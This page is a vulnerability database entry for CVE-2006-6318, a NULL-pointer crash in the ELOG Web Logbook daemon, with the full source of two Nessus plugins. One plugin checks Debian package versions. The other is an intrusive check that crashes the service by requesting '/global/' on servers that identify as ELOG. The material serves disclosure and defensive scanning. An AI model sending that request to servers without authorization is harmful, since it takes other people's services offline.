Vulnerabilities > CVE-2006-6318 - Denial Of Service vulnerability in ELOG Web Logbook ELogD Server

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
stefan-ritt
nessus

Summary

The show_elog_list function in elogd.c in elog 2.6.2 and earlier allows remote authenticated users to cause a denial of service (daemon crash) by attempting to access a logbook whose name begins with "global", which results in a NULL pointer dereference. NOTE: some of these details are obtained from third-party information. Authentication is required for successful exploitation only if the application is configured with a password; by default it is not, so a default installation can be crashed by an unauthenticated remote request.

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-1242.NASL
    descriptionSeveral remote vulnerabilities have been discovered in elog, a web-based electronic logbook, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2006-5063 Tilman Koschnick discovered that log entry editing in HTML is vulnerable to cross-site scripting. This update disables the vulnerable code. - CVE-2006-5790 Ulf Harnhammar of the Debian Security Audit Project discovered several format string vulnerabilities in elog, which may lead to execution of arbitrary code. - CVE-2006-5791 Ulf Harnhammar of the Debian Security Audit Project discovered cross-site scripting vulnerabilities in the creation of new logbook entries. - CVE-2006-6318 Jayesh KS and Arun Kethipelly of OS2A discovered that elog performs insufficient error handling in config file parsing, which may lead to denial of service through a NULL pointer dereference.
    last seen2020-06-01
    modified2020-06-02
    plugin id23947
    published2006-12-30
    reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/23947
    titleDebian DSA-1242-1 : elog - several vulnerabilities
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-1242. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    # Registration phase: when the scanner loads the plugin with `description`
    # set, this block only declares metadata (ids, CVE references, advisory text,
    # dependencies, required KB keys) and then exits without testing anything.
    if (description)
    {
      script_id(23947);
      script_version("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:20");
    
      # All four CVEs covered by DSA-1242 are attached to this one plugin. The
      # test further down is a single package-version comparison, so a finding
      # does not say which of the four issues is actually reachable on the host.
      script_cve_id("CVE-2006-5063", "CVE-2006-5790", "CVE-2006-5791", "CVE-2006-6318");
      script_xref(name:"DSA", value:"1242");
    
      script_name(english:"Debian DSA-1242-1 : elog - several vulnerabilities");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several remote vulnerabilities have been discovered in elog, a
    web-based electronic logbook, which may lead to the execution of
    arbitrary code. The Common Vulnerabilities and Exposures project
    identifies the following problems :
    
      - CVE-2006-5063
        Tilman Koschnick discovered that log entry editing in
        HTML is vulnerable to cross-site scripting. This update
        disables the vulnerable code.
    
      - CVE-2006-5790
        Ulf Harnhammar of the Debian Security Audit Project
        discovered several format string vulnerabilities in
        elog, which may lead to execution of arbitrary code.
    
      - CVE-2006-5791
        Ulf Harnhammar of the Debian Security Audit Project
        discovered cross-site scripting vulnerabilities in the
        creation of new logbook entries.
    
      - CVE-2006-6318
        Jayesh KS and Arun Kethipelly of OS2A discovered that
        elog performs insufficient error handling in config file
        parsing, which may lead to denial of service through a
        NULL pointer dereference."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2006-5063"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2006-5790"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2006-5791"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2006-6318"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.debian.org/security/2006/dsa-1242"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the elog package.
    
    For the stable distribution (sarge) these problems have been fixed in
    version 2.5.7+r1558-4+sarge3.
    
    The upcoming stable distribution (etch) will no longer include elog."
      );
      # The vector scores partial confidentiality, integrity and availability
      # impact. NOTE(review): presumably this reflects the most severe issues in
      # the advisory (the format-string flaws described above as possibly leading
      # to code execution) rather than the NULL-dereference DoS alone - confirm
      # before using it to rank CVE-2006-6318 on its own.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
    
      # "local": the verdict is derived from package data collected on the host
      # (see the dpkg KB key below), not from probing the elog service.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:elog");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/12/27");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/12/30");
      script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/25");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
      script_family(english:"Debian Local Security Checks");
    
      # The check needs three KB entries: local checks enabled, the Debian
      # release and the dpkg package list. ssh_get_info.nasl is the declared
      # dependency - presumably the plugin that fills them in; TODO confirm.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      # Registration ends here; nothing below this block runs in this phase.
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    # Preconditions: each lookup that comes back empty ends the run with the
    # matching audit code, so the package comparison is only reached when local
    # checks are enabled and a Debian release plus dpkg listing are in the KB.
    if (!get_kb_item("Host/local_checks_enabled"))
      audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release"))
      audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l"))
      audit(AUDIT_PACKAGE_LIST_MISSING);

    # Compare the elog package on Debian 3.1 with the fixed version named in the
    # advisory. This is a package-level result: it does not show whether elogd
    # is running or reachable, nor which of the advisory's CVEs applies.
    # (deb_check comes from debian_package.inc; a true result is taken to mean
    # "older than the reference" - TODO confirm.)
    outdated = deb_check(release:"3.1", prefix:"elog", reference:"2.5.7+r1558-4+sarge3");

    if (!outdated) audit(AUDIT_HOST_NOT, "affected");
    else
    {
      # Attach the package report only when the scan asks for verbose output.
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    
  • NASL familyCGI abuses
    NASL idELOG_LOGBOOK_GLOBAL_DOS.NASL
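    descriptionThe remote web server is identified as ELOG Web Logbook, an open source blogging software. The version of ELOG Web Logbook installed on the remote host is vulnerable to a denial of service attack by requesting '/global' or any logbook with 'global' in its name. When a request like this is received, a NULL pointer dereference occurs, leading to a crash of the service.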
    last seen2020-06-01
    modified2020-06-02
    plugin id23652
    published2006-11-20
    reporterThis script is Copyright (C) 2006-2011 Justin Seitz
    sourcehttps://www.tenable.com/plugins/nessus/23652
    titleELOG Web LogBook global Denial of Service
    code
    #
    #	This script was written by Justin Seitz <[email protected]>
    #	Per Justin : GPLv2
    #
    
    
    include("compat.inc");
    
    # Registration phase: declares the plugin's metadata and exits. No request
    # is sent to the target from inside this block.
    if(description) {
    	script_id(23652);
    	script_version("1.15");
    
    	script_cve_id("CVE-2006-6318");
    	script_bugtraq_id(21028);
    
    	name["english"] = "ELOG Web LogBook global Denial of Service";
    	# The summary states it plainly: the check works by attempting the crash,
    	# not by reading a version number.
    	summary["english"] = "Tries to crash the remote service.";
    	family["english"] = "CGI abuses";
    
    	script_name(english:name["english"]);
     script_set_attribute(attribute:"synopsis", value:
    "The remote web server is affected by a denial of service issue." );
     # NOTE(review): the CVE summary speaks of logbook names that begin with
     # "global"; the wording below ('global' in its name) is broader - confirm
     # which is accurate before relying on it for filtering or detection rules.
     script_set_attribute(attribute:"description", value:
    "The remote web server is identified as ELOG Web Logbook, an open
    source blogging software. 
    
    The version of ELOG Web Logbook installed on the remote host is
    vulnerable to a denial of service attack by requesting '/global' or
    any logbook with 'global' in its name.  When a request like this is
    received, a NULL pointer dereference occurs, leading to a crash of the
    service." );
     script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Nov/196" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?67c4b2ac" );
     script_set_attribute(attribute:"see_also", value:"https://midas.psi.ch/elogs/Forum/2053" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to ELOG version 2.6.2-7 or later." );
     # Base vector: network-reachable, low complexity, no authentication,
     # availability impact only.
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
     # Temporal metrics: functional exploit (E:F), official fix available
     # (RL:OF), report confirmed (RC:C).
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/20");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/09");
     script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_end_attributes();
    
    	script_summary(english:summary["english"]);
    
    	# ACT_DENIAL puts the plugin in the denial-of-service category. Scanners
    	# normally leave this category out of "safe checks" scans - confirm against
    	# the scan policy before enabling it for production hosts.
    	script_category(ACT_DENIAL);
    	script_copyright(english:"This script is Copyright (C) 2006-2011 Justin Seitz");
    
    	script_family(english:family["english"]);
    
    	# Candidate ports: whatever the KB lists under Services/www, plus 8080.
    	script_dependencies("http_version.nasl");
    	script_require_ports("Services/www", 8080);
    	exit(0);
    }
    
    include("http_func.inc");
    include("http_keepalive.inc");
    
    #
    # Pre-flight: resolve the HTTP port (default 8080) and stop early when it is
    # closed or the server is already unresponsive, so that a server that was
    # down beforehand is not reported as crashed by this check.
    #
    port = get_http_port(default:8080, embedded:TRUE);
    if (!get_port_state(port))
      exit(0, "TCP port "+port+" is closed.");
    if (http_is_dead(port:port))
      exit(1, "The web server on port "+port+" is already dead.");

    #
    # Gate on the banner: only a server that identifies itself as ELOG is
    # sent the request below.
    #
    server_banner = get_http_banner(port:port);
    if (isnull(server_banner))
      exit(1, "Cannot read the HTTP banner on port "+port+".");
    if (!("Server: ELOG HTTP" >< server_banner))
      exit(0, "The web server on port "+port+" is not ELOG.");

    #
    # Intrusive step: request the "/global/" logbook. The reply itself is not
    # inspected; the verdict comes from the liveness probe that follows.
    #
    crash_request = http_get(port:port, item:"/global/");
    reply = http_send_recv(port:port, data:crash_request);

    #
    # A server that no longer answers is reported as affected. A finding
    # therefore means the daemon went down during this check, so expect elogd
    # to need a restart after a positive result. When the server survives, the
    # script ends without a report or an exit message.
    #
    if (http_is_dead(port:port))
    {
      security_warning(port);
    }